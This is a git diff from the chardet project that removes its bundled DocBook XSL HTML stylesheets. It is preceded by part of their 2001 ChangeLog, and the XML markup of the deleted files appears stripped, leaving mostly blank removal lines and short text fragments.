all be processed. - -2001-05-13 Norman Walsh - - * param.xsl: Fixed ID typo - - * synop.xsl: Fixed synopfragmentref link (suggested by Philippe Martin) - -2001-05-12 Norman Walsh - - * autotoc.xsl, param.xsl: Mostly failed attempt to add bridgeheads to the automatic TOC; this option is turned off by default and you should leave it that way. - - * sections.xsl: Calculate the heading level for bridgeheads - -2001-05-03 Norman Walsh - - * lists.xsl: Output anchors for procedures and steps - - * table.xsl: Process head/body/foot in the right order - -2001-04-29 Norman Walsh - - * chunk-common.xsl, chunk.xsl, xtchunk.xsl: Automatically make an index when chunking with a processor other than XT - -2001-04-26 Norman Walsh - - * changebars.xsl: Support a few more elements - - * inline.xsl: Make glossterms hot if they're links. And make them italic. - - * lists.xsl: Improve procedure step/substep enumeration - -2001-04-24 Norman Walsh - - * chunk-common.xsl: Fix chunking bug - - * chunk-common.xsl: Feature request 416507: added chunk.sections and chunk.first.sections to provide greater chunking flexibility - - * chunker.xsl: Output ID in message - - * glossary.xsl: Fix bug that caused duplicated glossary entries - - * qandaset.xsl: Bug #418100: fix qandaentry anchors; also fixed formatting bug in questions with indexterms - -2001-04-21 Jirka Kosek - - * chunker.xsl: Added parameters for changing output encoding in chunked HTML - -2001-04-21 Norman Walsh - - * inline.xsl: Improve processing of trademarks - -2001-04-21 Jirka Kosek - - * param.xsl: Added parameters for changing output encoding in chunked HTML - -2001-04-20 Norman Walsh - - * inline.xsl: Restoring accidentally deleted citetitle template - -2001-04-18 Norman Walsh - - * autoidx.xsl: Fix bug: lowercase and uppercase need to be strings (not element names :-) - - * inline.xsl, param.xsl: Bug #413982, easy support for man page CGI links on citerefentry - -2001-04-17 Norman Walsh - - * docbook.xsl, param.xsl: Move label.from.part parameter into param.xsl; default it to 0 so that chapters and appendixes are numbered monotonically throughout a book by default. Moved param.xsl up in the include list, just for good measure - -2001-04-16 Norman Walsh - - * component.xsl: Fix bug in processing of subtitle content on components - - * glossary.xsl, titlepage.templates.xml: Fix formatting of glossarys--things were really broken - - * xref.xsl: Patches Tracker #415439: support title attribute on HTML anchors associated with xrefs - -2001-04-15 Norman Walsh - - * chunk-common.xsl: Process footnotes correctly when chunking; add summary attribute to navigation tables - - * docbook.xsl: Support inheriting of *info keywords - - * footnote.xsl, sections.xsl: Process footnotes correctly when chunking - - * formal.xsl: Use gentext templates for formal object titles - - * param.xsl: Added new parameters: inherit.keywords, process.source.toc, and process.empty.source.toc; changed the default for spacing.paras to 0 - - * table.xsl: Improve support for align attribute on tgroup - - * toc.xsl: Support DocBook toc markup - - * xref.xsl: Make a title attribute on HTML anchors for links to things with titles - -2001-04-05 Norman Walsh - - * table.xsl: Don't translate tgroup align into HTML table align--they don't mean the same thing - - * titlepage.xsl: Suppress titleabbrev on the title page - -2001-04-04 Norman Walsh - - * chunk-common.xsl: Move xsl:message about chunks into the chunker modules - - * chunker.xsl: Support indent and doctype public/system on chunks (for Saxon, anyway, Xalan's multiple-document extension doesn't seem to support this) - - * xtchunker.xsl: Use xsl:choose to support xml, html, and text output methods - -2001-04-03 Norman Walsh - - * callout.xsl: Fix bug 412487, make XSL-generated callout marks honor callout mark parameters - - * chunk-common.xsl: Remove unnecessary xmlns declarations - - * chunker.xsl: Patch to make saxon not produce xml version=1.1 documents - - * param.xsl: Documentation fixes - - * qandaset.xsl: Apply patch 412510 by Jon Willeke, make xref to Question work correctly - - * xref.xsl: Remove unnecessary parameter assignment - -2001-04-02 Norman Walsh - - * .cvsignore, Makefile, admon.xsl, autoidx.xsl, autotoc.xsl, biblio.xsl, block.xsl, callout.xsl, changebars.xsl, chunk-common.xsl, chunk.xsl, chunker.xsl, component.xsl, division.xsl, docbook.xsl, ebnf.xsl, footnote.xsl, formal.xsl, glossary.xsl, graphics.xsl, html.xsl, index.xsl, info.xsl, inline.xsl, keywords.xsl, lists.xsl, math.xsl, param.xsl, pi.xsl, qandaset.xsl, refentry.xsl, sections.xsl, synop.xsl, table.xsl, titlepage.templates.xml, titlepage.xsl, toc.xsl, verbatim.xsl, xref.xsl, xtchunk.xsl, xtchunker.xsl: - New file. - - * Makefile: Use the cvstools version of saxon - diff --git a/chardet/docs/docbook/xsl/html/admon.xsl b/chardet/docs/docbook/xsl/html/admon.xsl deleted file mode 100644 index 3adf38d..0000000 --- a/chardet/docs/docbook/xsl/html/admon.xsl +++ /dev/null @@ -1,124 +0,0 @@ - - - - - - - - 25 - - - - - - - - - - - - - - - - - - note - warning - caution - tip - important - note - - - - - - - - Note - Warning - Caution - Tip - Important - Note - - - -
    - - - - - - - - - - - : - - - - - - - - - - -
    - - - - [{$admon.type}] - - - - - - - - - -
    - -
    -
    -
    - - -
    - - - - - - -

    - - - - -

    - - -
    -
    - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/autoidx-ng.xsl b/chardet/docs/docbook/xsl/html/autoidx-ng.xsl deleted file mode 100644 index 17f8ab5..0000000 --- a/chardet/docs/docbook/xsl/html/autoidx-ng.xsl +++ /dev/null @@ -1,75 +0,0 @@ - - - - - - - - - - -]> - - - - - - - - - - - - -
    - - - - -
    -
    - - - - - - - -
    -

    - -

    -
    - - - - -
    -
    -
    -
    - -
    diff --git a/chardet/docs/docbook/xsl/html/autoidx.xsl b/chardet/docs/docbook/xsl/html/autoidx.xsl deleted file mode 100644 index 758e909..0000000 --- a/chardet/docs/docbook/xsl/html/autoidx.xsl +++ /dev/null @@ -1,415 +0,0 @@ - - - - - - - - - - - - - -]> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - -
    -

    - - - -

    -
    - - - - -
    -
    -
    - - - - - -
    -
    - - - - - - - - -
    - -

    - -

    -
    -
    - - - - -
    -
    -
    -
    - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - -
    - -
    -
    - - - - - - - - -
    -
    -
    -
    - - - - - - -
    - - - - - - - - - - - - - -
    - -
    -
    - - - - - - - - -
    -
    -
    -
    - - - - - - -
    - - - - - - - - - - - - - -
    - -
    -
    - - - - - - - - -
    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - - - - - - - - - ( - - - - - - ) - - - - - -
    - ( - - - - - - ) -
    -
    - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/autotoc.xsl b/chardet/docs/docbook/xsl/html/autotoc.xsl deleted file mode 100644 index 050cbce..0000000 --- a/chardet/docs/docbook/xsl/html/autotoc.xsl +++ /dev/null @@ -1,575 +0,0 @@ - - - - - - - - dt - li - - - - - - - dd - - - - - - - - - - - -

    - - - TableofContents - - -

    -
    -
    - - - - - - - - - -
    - - - - - - -
    -
    -
    - - -
    - - - - - - -
    -
    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - 2 - 3 - 4 - 5 - 1 - 2 - 3 - - - - - - - 2 - 3 - 4 - 5 - 6 - 2 - 3 - 4 - 1 - - - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -

    - - - - - ListofTables - ListofFigures - ListofEquations - ListofExamples - ListofProcedures - ListofUnknown - - - - -

    - - - - - - -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - -
    - diff --git a/chardet/docs/docbook/xsl/html/biblio.xsl b/chardet/docs/docbook/xsl/html/biblio.xsl deleted file mode 100644 index ce88edb..0000000 --- a/chardet/docs/docbook/xsl/html/biblio.xsl +++ /dev/null @@ -1,1046 +0,0 @@ - - - - - - - - -
    - - - - - - - - - - - - - -
    -
    - - - - - - - - - -
    - -
    -
    - - -

    - - - - -

    -
    - - - - -
    - - - - - -
    - -
    -
    -
    - - - - - - - - - - - - - - - - - - - No bibliography entry: - - found in - - -
    - -

    - - Error: no bibliography entry: - - found in - -

    -
    -
    -
    -
    - -
    - -

    - - -

    -
    -
    -
    -
    - - - - - - - - - - - - - - - - - No bibliography entry: - - found in - - -
    - -

    - - Error: no bibliography entry: - - found in - -

    -
    -
    -
    -
    - -
    - -

    - - -

    -
    -
    -
    -
    - - - - - - - [ - - ] - - - [ - - ] - - - [ - - ] - - - [ - - ] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - copyright - - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/block.xsl b/chardet/docs/docbook/xsl/html/block.xsl deleted file mode 100644 index 7a1ba4c..0000000 --- a/chardet/docs/docbook/xsl/html/block.xsl +++ /dev/null @@ -1,426 +0,0 @@ - - - - - - - - - - - - - - - -
    - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    - - - - - - -

    -
    - - - - - - - - - - - -
    - - - -

    - - - - - - - - -

    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - -
      - -  
    - -- - -  
    -
    - -
    - -
    -
    -
    -
    -
    - - -
    -

    - - - -

    -
    -
    - - -
    - - -
    - -- -
    -
    -
    -
    - - - - - - - - -
    - - -
    -
    - - -

    - -

    -
    - - - - -
    - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    - - - - - - - -

    -
    - - -

    - - - - - - - -

    -
    - - -

    - - - - - - - -

    -
    - - - - - - -

    -
    - - - - -
    - - - - - -
    - - - - - -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - nbsp - - - - - - - - - - - - - - - - - - - - - - - - - - - - - , - - - - - - - - - - - - - - - - - - -

    - -

    -
    - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/callout.xsl b/chardet/docs/docbook/xsl/html/callout.xsl deleted file mode 100644 index cfbf11c..0000000 --- a/chardet/docs/docbook/xsl/html/callout.xsl +++ /dev/null @@ -1,197 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - No insertCallouts function is available. - - - - - - - -
    - - - - - -
    -
    - -
    - - -
    -
    -
    -
    - -
    - -
    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Error: coref link is broken: - - - - - - Error: coref doesn't point to a co: - - - - - - - - - - - - - - - - - - - - - - - {$conum} - - - - - - - - - - - - - - - - - - - - Don't know how to generate Unicode callouts - when $callout.unicode.start.character is - - - ( - - ) - - - - - ( - - ) - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/changebars.xsl b/chardet/docs/docbook/xsl/html/changebars.xsl deleted file mode 100644 index 2bce785..0000000 --- a/chardet/docs/docbook/xsl/html/changebars.xsl +++ /dev/null @@ -1,96 +0,0 @@ - - - - - - - - - - - - - - - - - -
    - -
    -
    - - - - - - - - - - - - Revisionflag on unexpected element: - - (Assuming block) - -
    - -
    -
    -
    -
    - -
    diff --git a/chardet/docs/docbook/xsl/html/chunk-code.xsl b/chardet/docs/docbook/xsl/html/chunk-code.xsl deleted file mode 100644 index 90408cd..0000000 --- a/chardet/docs/docbook/xsl/html/chunk-code.xsl +++ /dev/null @@ -1,823 +0,0 @@ - - - - - - - - - - - - - - - - - - - Computing chunks... - - - - - Fast chunking requires exsl:node-set(). - Using "slow" chunking. - - - - - - - - - - - - - -
    - -
    -
    - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Error - - is not a chunk! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ID ' - - ' not found in document. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -toc - - - - - - - - - - -

    - -

    - -
    -
    -
    - -
    -
    - - - -
    -
    -
    - - - - - - - - - - - - - - - - - 0 - 1 - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    -
    - - - - -
    -
    -
    - - - - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/chunk-common.xsl b/chardet/docs/docbook/xsl/html/chunk-common.xsl deleted file mode 100644 index 4abf3ef..0000000 --- a/chardet/docs/docbook/xsl/html/chunk-common.xsl +++ /dev/null @@ -1,1003 +0,0 @@ - - - - - - - - - - - - - - - - - - - 1 - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - 1 - 1 - 1 - 1 - 1 - 1 - 1 - 1 - 1 - 1 - 1 - 1 - 1 - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - bk - - - - - - - - - - - - - - - ar - - - - - - - - - - - - - - - pr - - - - - - - - - - - - - - - ch - - - - - - - - - - - - - - - ap - - - - - - - - - - - - - - - - - - - pt - - - - - - - - - - - - - - - - - - - rn - - - - - - - - - - - - - - - - - - re - - - - - - - - - - - - - - - - - - - co - - - - - - - - - - - s - - - - - - - - - - - - - - - - - - - bi - - - - - - - - - - - - - - - - - - - go - - - - - - - - - - - - - - - - - - - ix - - - - - - - - si - - - - - - - - chunk-filename-error- - - - - - - - - - - - - - - - - - - - - - - - # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - xxx - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/chunk.xsl b/chardet/docs/docbook/xsl/html/chunk.xsl deleted file mode 100644 index 15941b2..0000000 --- a/chardet/docs/docbook/xsl/html/chunk.xsl +++ /dev/null @@ -1,40 +0,0 @@ - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/chunker.xsl b/chardet/docs/docbook/xsl/html/chunker.xsl deleted file mode 100644 index e860921..0000000 --- a/chardet/docs/docbook/xsl/html/chunker.xsl +++ /dev/null @@ -1,423 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Don't know how to chunk with - - - - - - - - - - - - - - - - - - - - - - - - - Writing - - - for - - - ( - - ) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Can't make chunks with - - 's processor. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/chunkfast.xsl b/chardet/docs/docbook/xsl/html/chunkfast.xsl deleted file mode 100644 index e0a7a4c..0000000 --- a/chardet/docs/docbook/xsl/html/chunkfast.xsl +++ /dev/null @@ -1,71 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/chunktoc.xsl b/chardet/docs/docbook/xsl/html/chunktoc.xsl deleted file mode 100644 index 70d4ca8..0000000 --- a/chardet/docs/docbook/xsl/html/chunktoc.xsl +++ /dev/null @@ -1,243 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - 1 - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - The chunk.toc file is not set. - - - - - - - - ID ' - - ' not found in document. - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/component.xsl b/chardet/docs/docbook/xsl/html/component.xsl deleted file mode 100644 index fc96f2e..0000000 --- a/chardet/docs/docbook/xsl/html/component.xsl +++ /dev/null @@ -1,404 +0,0 @@ - - - - - - - - - -

    - - - - - - - -

    -
    - - - - - - -

    - - - -

    -
    -
    - - - - - - - -
    - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - -
    -
    - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - . - - - - - - - - - - - - - - - - - - - - - . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - -
    - diff --git a/chardet/docs/docbook/xsl/html/division.xsl b/chardet/docs/docbook/xsl/html/division.xsl deleted file mode 100644 index c5a8935..0000000 --- a/chardet/docs/docbook/xsl/html/division.xsl +++ /dev/null @@ -1,175 +0,0 @@ - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - -

    - -

    -
    - - -

    - -

    -
    - - - - - - - - - - - -
    - diff --git a/chardet/docs/docbook/xsl/html/docbook.xsl b/chardet/docs/docbook/xsl/html/docbook.xsl deleted file mode 100644 index 1a91fd9..0000000 --- a/chardet/docs/docbook/xsl/html/docbook.xsl +++ /dev/null @@ -1,411 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - No template matches - - - in - - - . - - - - < - - > - - </ - - > - - - - - - - - - white - black - #0000FF - #840084 - #0000FF - - - - - - - - - - <xsl:copy-of select="$title"/> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ID ' - - ' not found in document. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/docbookng.xsl b/chardet/docs/docbook/xsl/html/docbookng.xsl deleted file mode 100644 index 4f8e7a6..0000000 --- a/chardet/docs/docbook/xsl/html/docbookng.xsl +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - diff --git a/chardet/docs/docbook/xsl/html/ebnf.xsl b/chardet/docs/docbook/xsl/html/ebnf.xsl deleted file mode 100644 index 261ee07..0000000 --- a/chardet/docs/docbook/xsl/html/ebnf.xsl +++ /dev/null @@ -1,327 +0,0 @@ - - - - - - - - -$Id: ebnf.xsl,v 1.1.1.1 2004/06/22 02:10:02 f8dy Exp $ - -Walsh -Norman -19992000 -Norman Walsh - - -HTML EBNF Reference - - -
    Introduction - -This is technical reference documentation for the DocBook XSL -Stylesheets; it documents (some of) the parameters, templates, and -other elements of the stylesheets. - -This reference describes the templates and parameters relevant -to formatting EBNF markup. - -This is not intended to be user documentation. -It is provided for developers writing customization layers for the -stylesheets, and for anyone who's interested in how it -works. - -Although I am trying to be thorough, this documentation is known -to be incomplete. Don't forget to read the source, too :-) -
    -
    -
    - - - - - - - - - - - - 1 - - - - - - EBNF - - for - - - - - - - - - - - - -
    - -
    - - - - - - - - - - EBNF productions - -
    -
    -
    - - - - - - - - - - [ - - ] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   - - - - - - - - - - - - - Error: no ID for productionrecap linkend: - - . - - - - - - Warning: multiple "IDs" for productionrecap linkend: - - . - - - - - - - - - - - - - - - - | -
    -
    -
    - - - - - - - - - - - - - - - production - - - - - - - - - Non-terminals with no content must point to - production elements in the current document. - - - Invalid xpointer for empty nt: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ??? - - - - - - - - - - - - - /*  - -  */ -
    -
    - - - - - - - - - constraintdef - - - - - - - - - - - - - - - - : - - - - - - - : - - - - - - - - - -  ] - -
    -
    -
    - - -
    - - -
    -
    - - -

    -
    - - - -
    diff --git a/chardet/docs/docbook/xsl/html/footnote.xsl b/chardet/docs/docbook/xsl/html/footnote.xsl deleted file mode 100644 index a22af63..0000000 --- a/chardet/docs/docbook/xsl/html/footnote.xsl +++ /dev/null @@ -1,263 +0,0 @@ - - - - - - - - - - - #ftn. - - - - - - - [ - - - - ] - - - - - [ - - - - ] - - - - - - - - - - #ftn. - - - - - - [ - - - - ] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ftn. - - - - - - # - - - - -

    - - [ - - - - ] - - -

    -
    - - - - - - ftn. - - - - - - # - - - - - - - [ - - - - ] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    -
    - -
    -
    -
    - - - - - - - - -
    - -
    -
    - - -
    - - -
    -
    - - - - Warning: footnote number may not be generated - correctly; - - unexpected as first child of footnote. - -
    - -
    -
    -
    -
    - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/formal.xsl b/chardet/docs/docbook/xsl/html/formal.xsl deleted file mode 100644 index 0d88800..0000000 --- a/chardet/docs/docbook/xsl/html/formal.xsl +++ /dev/null @@ -1,333 +0,0 @@ - - - - - - - - - -
    - - - - - - - - - - - - - - - -

    - - -

    - - - - - - - - - - - -

    -
    - - - -

    - - - - - -

    -
    - - - - -
    -

    - - - - - - - - - -

    -

    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - before - - - - - - - - - - - - - - - - - - - -
    - - - float: - - ; - - - - - -
    -
    - - - - - -
    -
    - - - - - - - - - - - - - - - - - - Broken table: tr descendent of CALS Table. - - - - - - - - - - before - - - - - - - - - - - - - - - - - - - - - - - - - Broken table: row descendent of HTML table. - - - - - - - - - - - - - - before - - - - - - - - - - - - - - - - - - - - - before - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/html/glossary.xsl b/chardet/docs/docbook/xsl/html/glossary.xsl deleted file mode 100644 index 2be6cae..0000000 --- a/chardet/docs/docbook/xsl/html/glossary.xsl +++ /dev/null @@ -1,359 +0,0 @@ - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - -
    - -
    -
    -
    - - - - -
    -
    - - - - - - - - - -
    - - - - -
    - -
    -
    -
    - - - - -
    - - -
    - -
    -
    -
    - - -

    - -

    -
    - - - - - - - - -
    - - - - 0 - 1 - - - - - - - - ( - - ) - - - - - -
    -
    - -
    - - - - 0 - 1 - - - - - - - - ( - - ) - -
    -
    - -
    - - - - 0 - 1 - - - - - -
    -
    -
    - - -
    - - - - , - - - - - , - - - - - , - - - - - - - - - - -
    -

    - - - - - - - - - - - - - Warning: glosssee @otherterm reference not found: - - - - - - - - - . -

    -
    -
    - - -
    - - -

    - - - - - -

    -
    -
    -
    - - - - - - - - - - - - - - - Warning: glossseealso @otherterm reference not found: - - - - - - - - - - - - . - - - , - - - - - - - - - - - - - - - Warning: processing automatic glossary - without a glossary.collection file. - - - - - - Warning: processing automatic glossary but unable to - open glossary.collection file ' - - ' - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - -
    -
    -
    - - - - -
    -
    - - - - - - - - - -
    - - -
    - - - - - - -
    -
    -
    - - - -
    diff --git a/chardet/docs/docbook/xsl/html/graphics.xsl b/chardet/docs/docbook/xsl/html/graphics.xsl deleted file mode 100644 index 325bd83..0000000 --- a/chardet/docs/docbook/xsl/html/graphics.xsl +++ /dev/null @@ -1,1146 +0,0 @@ - - - - - - - - - - - - - - 1 - - - - - 1 - - - - - -
    - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - 0 - 0 - - 1 - 0 - - - - - - 1.0 - 1.0 - - - - 1.0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - px - - - - - - - - - - - px - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - px - - - - - - - - - - - px - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - 0 - - - - - - - - - - - - - - - - - - - - - - - - - - - middle - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - middle - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - height: - - px - - - - - - - - - - - -
    - - - - - background-color: - - - - - - - - - - - - - - - - - - - - - -
    -
    - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - middle - - - - - - - - - - - - - - - - - -
    - - - - - - - -
    -
    -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - No insertfile extension available. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - No insertfile extension available. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - No insertfile extension available. - - - - - - - - - - - - - -
    - -
    -
    - - - - - - - - - - - -
